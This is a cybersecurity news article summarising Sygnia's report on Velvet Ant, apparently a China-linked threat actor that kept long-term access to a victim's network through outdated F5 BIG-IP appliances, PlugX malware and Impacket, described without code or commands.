A Chinese state-sponsored threat actor was seen maintaining persistent access to a victim organization’s network for three years using a legacy F5 BIG-IP appliance, cybersecurity firm Sygnia reports.
Dubbed Velvet Ant, the threat actor used multiple mechanisms to ensure a foothold in the organization’s network, quickly pivoting from addressed mechanisms to new ones and showing adaptability in evading detection.
“This threat actor had infiltrated the organization’s network at least two years prior to the investigation, and had succeeded in gaining a strong foothold, and intimate knowledge of the network,” the cybersecurity firm notes.
Velvet Ant was seen using various tools and techniques to compromise critical systems and access sensitive data, and deployed dormant persistence mechanisms in unmonitored systems, including the PlugX remote access trojan (RAT).
The threat actor was observed employing DLL search order hijacking, DLL sideloading, and phantom DLL loading, as well as tampering with the installed security software before deploying the PlugX malware.
Demonstrating a high level of operational security (OPSEC) awareness, the hacking group did not install the malware on a workstation on which it failed to disable the security software.
Velvet Ant also used the open source tool Impacket for lateral tool transfer and remote code execution on compromised machines, and created firewall rules to allow connections to the command-and-control (C&C) server.
After eliminating the threat actor from the victim’s network, Sygnia observed it infecting new machines with PlugX samples reconfigured to use an internal server as C&C, and channeling external communication with the malware through that server.
Essentially, the threat actor infected systems that had internet access with a PlugX version configured with an external C&C server, to exfiltrate sensitive information, and infected a legacy server with the malware iteration that did not have a C&C.
Velvet Ant maintained access to the legacy file server through two F5 BIG-IP appliances running outdated, vulnerable software, using a reverse SSH tunnel connection.
“The PlugX instance on the compromised file server was used by the threat actor as an internal C&C server. From this server, the threat actor conducted reconnaissance activities, deployed additional instances of the PlugX onto legacy servers by leveraging Impacket’s WmiExec,” Sygnia notes.
The compromised F5 BIG-IP appliances were used by the victim for firewall, WAF, load balancing and local traffic management services. Both devices were directly exposed to the internet and they may have been hacked through the exploitation of known vulnerabilities.
On one of the compromised F5 appliances, the threat actor deployed tools such as VelvetSting (for receiving commands from the C&C), VelvetTap (to capture network packets), Samrid (the open source Socks proxy tunneller EarthWorm), and Esrde (with the same capabilities as VelvetSting).
Considering the targeted organization, the use of ShadowPad and PlugX malware, and the use of DLL sideloading techniques, Sygnia believes that Velvet Ant is a state-sponsored threat actor operating out of China.
Related: In Other News: China’s Undersea Spying, Hotel Spyware, Iran’s Disruptive Attacks
Related: UK, New Zealand Accuse China of Cyberattacks on Government Entities
Related: US Treasury Slaps Sanctions on China-Linked APT31 Hackers
